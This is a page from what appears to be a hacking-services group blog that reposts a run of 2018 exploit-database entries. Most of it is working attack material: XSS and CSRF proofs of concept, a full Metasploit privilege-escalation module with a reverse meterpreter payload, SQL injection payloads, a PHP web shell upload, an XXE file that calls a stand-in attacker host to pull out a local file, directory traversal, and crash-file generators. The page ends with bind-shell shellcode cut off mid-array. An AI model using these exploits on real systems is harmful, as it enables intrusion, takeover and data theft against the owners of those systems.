Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863580645

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities 
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: title
# 1) Login as a user who have access to Jibu Pro plugin.
# 2) Quizlord --> Add a Quiz.
# 3) At the title type: poc"><script>alert(1)</script>  , then fill the remaining fields and click Save. 
#   (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
# 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser.

# Post Request (Step 3):

POST /wordpress/wp-admin/admin.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
HireHackking 
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows 7 - 64-bit 
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Manager VPNC Username Privilege Escalation',
      'Description'    => %q{
        This module exploits an injection vulnerability in the Network Manager
        VPNC plugin to gain root privileges.

        This module uses a new line injection vulnerability in the configured
        username for a VPN network connection to inject a `Password helper`
        configuration directive into the connection configuration.

        The specified helper is executed by Network Manager as root when the
        connection is started.

        Network Manager VPNC versions prior to 1.2.6 are vulnerable.

        This module has been tested successfully with VPNC versions:
        1.2.4-4 on Debian 9.0.0 (x64); and
        1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Denis Andzakovic', # Discovery and exploit
          'Brendan Coles'     # Metasploit
        ],
      'DisclosureDate' => 'Jul 26 2018',
      'References'     =>
        [
          ['CVE', '2018-10900'],
          ['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
          ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
          ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
          ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
          ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
          ['URL', 'https://www.debian.org/security/2018/dsa-4253'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
          ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
        ],
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
          'WfsDelay'    => 10,
          'PrependFork' => true
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def check
    unless command_exists? 'nmcli'
      vprint_error 'Network Manager nmcli utility is not installed'
      return CheckCode::Safe
    end
    vprint_good 'nmcli utility is installed'

    CheckCode::Detected
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{@payload_name}"

    print_status 'Adding VPN connection...'
    vpn_data = []
    vpn_data << '+vpn.data "IKE DH Group = dh2"'
    vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
    vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
    vpn_data << '+vpn.data "IPSec secret-flags = 4"'
    vpn_data << '+vpn.data "Local Port = 0"'
    vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
    vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
    vpn_data << '+vpn.data "Vendor = cisco"'
    vpn_data << '+vpn.data "Xauth password-flags = 4"'
    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
    if res.include? 'Error'
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    res = cmd_exec 'nmcli connection'
    unless res.include? @payload_name
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Starting VPN connection...'
    cmd_exec "nmcli connection up #{@payload_name} & echo "
  end

  def cleanup
    print_status 'Removing VPN connection...'
    res = cmd_exec "nmcli connection delete #{@payload_name}"
    unless res.include? 'successfully deleted'
      print_warning "Could not remove VPN connection #{@payload_name}"
    end
    super
  end
end
HireHackking 
# Exploit Title: Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)
# Date: 2018-08-30
# Exploit Author: Uriel Corral Salinas
# Vendor Homepage: http://www.itlights.com
# Software Link: http://www.scanwith.com/download/Free_Visual_Ping.htm
# Version: Free Visual Ping  (Version 0.8.0.0)
# Tested on: Windows 10 Pro x64

# Visual Ping 0.8.0.0 - 'Host, Time Out,packet size, Pause, Loops' - Denial of Service (PoC)
# 1. Ejecutar codigo "Visual_Ping.py"
# 2. Copiar contenido de "VisualPing.txt" al portapapeles
# 3. Ejecutar VPing.exe
# 4. Copiar portapapeles en Host
# 5. Copiar portapapeles en Time Out
# 6. Copiar portapapeles en Packet size
# 7. Copiar portapapeles en Pause
# 8. Copiar portapapeles en Loops
# 9. Click en Star
# 10. Crashed

#!/usr/bin/env python

f=open("VisualPing.txt","w")
buff = "\x41" * 4108
ggg = "\x42" * 4
hhh = "\x43" * 4
iii = "\x44" * 4
f.write(buff + ggg + hhh + iii)
f.close()
HireHackking 
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-08-31
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
 
# Steps to Reproduce: 

# 1. Run the python code Nickname.py 
# 2. Open nickname_exploit.txt and copy the content 
# 3. Open VSAXESS.exe 
# 4. Register a password and username
# 5. choose 'Add'
# 6. choose 'Serial Port'
# 6. Paste the content from nickname_exploit.txt on 'Nickname'
# 7. Press 'Aceptar' and Crashed
 
#!/usr/bin/env python

content = "\x41" * 9300
f = open ("nickname_exploit.txt", "w")
f.write(content)
f.close()
HireHackking 
# Exploit Title: D-Link DIR-615 - Denial of Service (PoC)
# Date: 2018-08-09
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link:  https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6
# Version: D-Link DIR-615
# Category: Hardware
# Exploit Author:  Aniket Dinda
# Tested on: Linux (kali linux)
# Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/
# Cve: CVE-2018-15839

# Proof Of Concept:

1- First connect to this network
2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
3- Goto Easy setup > 
4- Now as the Burp is intercept is on, you will find an Authorization: Basic or cookie: SessionId followed by a string. Now we paste a string consisting oaf 5000 zeros.
5- Then forward the connection
6- Then your router automatically log out and the net connection will be gone.
HireHackking 
# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's 
# password will been changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
			<input type="hidden" name="username" value="admin" />
			<input type="hidden" name="password" value="123123" />
			<input type="hidden" name="role&#95;id" value="1" />
			<input type="hidden" name="id" value="1" />
			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
HireHackking 
# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection
# Author: hyp3rlinx
# Date: 2018-09-01
# Vendor: www.eventlogxp.com
# Software: https://eventlogxp.com/download.php
# Affected Component: elex.exe
# CVE: N/A

# Description:
# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers 
# can potentially gain access to local files.

# PoC
python -m SimpleHTTPServer
 
"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>
HireHackking 
# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-01
# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf
# Software Link: App Store for iOS devices
# Tested Version: 5.5.1336
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py
# 2.- Copy content to clipboard
# 3.- Open App Vitual Mobile Infrastructure
# 4.- Paste ClipBoard on "Server address"
# 5.- Next
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 15000
print (buffer)
HireHackking 
# Exploit Title: Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)
# Author: Nawaf Alkeraithe
# Date: 2018-09-01
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/files/Admidio/3.3.x/admidio-3.3.5.zip/download
# Version: 3.3.5
# Tested on: PHP
# CVE: N/A

# Description:
# Low Privilage users are able to increase their permissions due to improper origin checking
# by the vendor. 

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://Target/adm_program/modules/roles/roles_function.php?rol_id=2&mode=2">
	<table>
		<tr><td>rol_name</td><td><input type="text" value="Member" name="rol_name"></td></tr>
		<tr><td>rol_description</td><td><input type="text" value="All+organization+members" name="rol_description"></td></tr>
		<tr><td>rol_cat_id</td><td><input type="text" value="4" name="rol_cat_id"></td></tr>
		<tr><td>rol_mail_this_role</td><td><input type="text" value="2" name="rol_mail_this_role"></td></tr>
		<tr><td>rol_this_list_view</td><td><input type="text" value="1" name="rol_this_list_view"></td></tr>
		<tr><td>rol_leader_rights</td><td><input type="text" value="3" name="rol_leader_rights"></td></tr>
		<tr><td>rol_lst_id</td><td><input type="text" value="0" name="rol_lst_id"></td></tr>
		<tr><td>rol_default_registration</td><td><input type="text" value="1" name="rol_default_registration"></td></tr>
		<tr><td>rol_max_members</td><td><input type="text" value="" name="rol_max_members"></td></tr>
		<tr><td>rol_cost</td><td><input type="text" value="" name="rol_cost"></td></tr>
		<tr><td>rol_cost_period</td><td><input type="text" value="" name="rol_cost_period"></td></tr>
		<tr><td>rol_assign_roles</td><td><input type="text" value="1" name="rol_assign_roles"></td></tr>
		<tr><td>rol_all_lists_view</td><td><input type="text" value="1" name="rol_all_lists_view"></td></tr>
		<tr><td>rol_approve_users</td><td><input type="text" value="1" name="rol_approve_users"></td></tr>
		<tr><td>rol_edit_user</td><td><input type="text" value="1" name="rol_edit_user"></td></tr>
		<tr><td>rol_mail_to_all</td><td><input type="text" value="1" name="rol_mail_to_all"></td></tr>
		<tr><td>rol_profile</td><td><input type="text" value="1" name="rol_profile"></td></tr>
		<tr><td>rol_announcements</td><td><input type="text" value="1" name="rol_announcements"></td></tr>
		<tr><td>rol_dates</td><td><input type="text" value="1" name="rol_dates"></td></tr>
		<tr><td>rol_photo</td><td><input type="text" value="1" name="rol_photo"></td></tr>
		<tr><td>rol_download</td><td><input type="text" value="1" name="rol_download"></td></tr>
		<tr><td>rol_guestbook</td><td><input type="text" value="1" name="rol_guestbook"></td></tr>
		<tr><td>rol_guestbook_comments</td><td><input type="text" value="1" name="rol_guestbook_comments"></td></tr>
		<tr><td>rol_weblinks</td><td><input type="text" value="1" name="rol_weblinks"></td></tr>
		<tr><td>rol_start_date</td><td><input type="text" value="" name="rol_start_date"></td></tr>
		<tr><td>rol_end_date</td><td><input type="text" value="" name="rol_end_date"></td></tr>
		<tr><td>rol_start_time</td><td><input type="text" value="" name="rol_start_time"></td></tr>
		<tr><td>rol_end_time</td><td><input type="text" value="" name="rol_end_time"></td></tr>
		<tr><td>rol_weekday</td><td><input type="text" value="" name="rol_weekday"></td></tr>
		<tr><td>rol_location</td><td><input type="text" value="" name="rol_location"></td></tr>
		<tr><td>btn_save</td><td><input type="text" value="" name="btn_save"></td></tr>
	</table>
<input type="submit">
</form>
</html>
HireHackking 
# Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
# Date: 2018-09-01
# Exploit Author: Ghaaf
# Vendor Homepage: http://www.microsoft.com
# Version: Windows 7(x86/x64)
# Tested on: 6.1.7601 Service Pack 1 Build 7601
# CVE: N/A

buffer = ''
buffer += "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00"
buffer += "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00"
buffer += "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68"
buffer += "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F"
buffer += "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20"
buffer += "\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88"
buffer += "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88"
buffer += "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00"
buffer += "\xE8\x2D\x73\x54\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x0F\x01"
buffer += "\x0B\x01\x06\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00"
buffer += "\x68\x11\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00"
buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
buffer += "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x10\x00\x00"
buffer += "\xB2\xEA\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00"
buffer += "\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x94\x1A\x00\x00\x28\x00\x00\x00"
buffer += "\x00\x30\x00\x00\xA4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x02\x00\x00\x20\x00\x00\x00"
buffer += "\x00\x10\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x2E\x74\x65\x78\x74\x00\x00\x00\x38\x0D\x00\x00\x00\x10\x00\x00"
buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x64\x61\x74\x61\x00\x00\x00"
buffer += "\xE0\x09\x00\x00\x00\x20\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0"
buffer += "\x2E\x72\x73\x72\x63\x00\x00\x00\xA4\x08\x00\x00\x00\x30\x00\x00"
buffer += "\x00\x10\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x40\x00\x00\x40\x6C\xDA\x5B\x4A\x10\x00\x00\x00"
open("poc.exe", "wb").write(buffer)
HireHackking 
# Exploit Title: Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-02
# Vendor Homepage: https://www.symantec.com/
# Software Link: https://itunes.apple.com/mx/app/symantec-mobile-encryption/id450235714?mt=8
# Tested Version: 2.1.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Symantec_Mobile_Encryption_2.1.0.py
# 2.- Copy content to clipboard
# 3.- Open App Symantec Mobile Encryption for iPhone
# 4.- User License -> Accept
# 5.- Instructions -> Setup
# 6.- Paste ClipBoard on "Server"
# 7.- User -> admin
# 8.- Password -> admin
# 9.- Next
# 10.- Network Settings -> Next
# 11.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 1907
print (buffer)
HireHackking 
# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux

# Description : An attacker can execute SQL commands through parameters
# that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations. Also there are XSS
# vulnerabilities too.

# PoC : SQLi 1 :
# Request(POST):

POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1

# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 

uname=test&catid=1 AND 4815=4815

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 

uname=test&catid=1 AND SLEEP(5)

# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: 

uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR

# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):

POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://server/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth

# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 

usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth
HireHackking 
# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.logicspice.com/products/faq-script
# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
# Version: 2.9.7
# Category: Webapps
# Tested on: Kali linux

# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
# leads to a remote command execution on the remote server.

# 1) Create a file with the below PHP code and save it as .php

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to FAQ Script admin portal as priviliage user
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
# 4) Click at the Actions button of a current FAQ product --> Edit
# 5) Click (Image) button on Content panel.
# 6) Chose Upload section and browse your .php file.
# 7) Finaly click "Send it to Server". Script will give you a link belong to
# our php file.
# 8) verift the exploit:
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id

# The request:

POST
/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter
Cookie: __asc=3c88bfff1659e6148e6168c52d2;
__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
admin_username=logicspice; admin_password=faqscript_admin;
CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------1036720403269880351068202740
Content-Length: 267
-----------------------------1036720403269880351068202740
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/x-php

<?php $cmd=$_GET['cmd']; system($cmd); ?>
-----------------------------1036720403269880351068202740--
HireHackking 
# Exploit Title: Wikipedia 12.0 - Denial of Service (PoC)
# Date: 9/2/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/en-us/p/wikipedia/9wzdncrfhwm4?activetab=pivot%3aoverviewtab
# Version: 12.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "wiki.txt"
# Copy the text from the generated wiki.txt file to clipboard
# Paste the text in the search bar in the top right of app
# App will now crash

buffer = "A" * 1000
payload = buffer
try:
    f=open("wiki.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: PHP File Browser Script 1 - Directory Traversal
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "index.php" is vulnerable to directory traversal.
# An attacker can see and read all files known by the name

# Vulnerable File: index.php
<?php // line 45

72  $script = basename(__FILE__); // the name of this script
73  $path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access
74
75  if($loc!=''){
76  echo "<p id='bloc'><b>Browsing Location: </b><a href='index.php'><b>".ucfirst($loc1)."</b></a>
77  <a href='$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>
78  <a href=''><b>".ucfirst($locdem3)."</b></a></p>";}
79  else{
80    echo "<p id='bloc'><b>Browsing Location: </b><a href=''><b>Demo</b></a></p>";

?> // line 151

# PoC :

https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]

# You can write the known directory name instead of [DirectoryName].
# Example: '/etc/' or '/var/www/'  
# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/
HireHackking 
# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-03
# Vendor Homepage: https://securimport.com/
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows XP Professional SP3 x86 es

# Steps to Produce the Buffer Overflow: 
# 1.- Run python code : iSmartViewPro_1.5.py
# 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard
# 3.- Open iSmartViewPro
# 4.- Add Device
# 5.- Add device manually
# 6.- Device alias -> test
# 7.- Paste ClipBoard on "DDNS/IP/DID"
# 8.- Account -> admin
# 9.- Password -> admin
# 10.- Save

#!/usr/bin/env python
 
#7E6B30D7 FFE4 JMP ESP SHELL32.dll
ret = "\xD7\x30\x6B\x7E"

#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
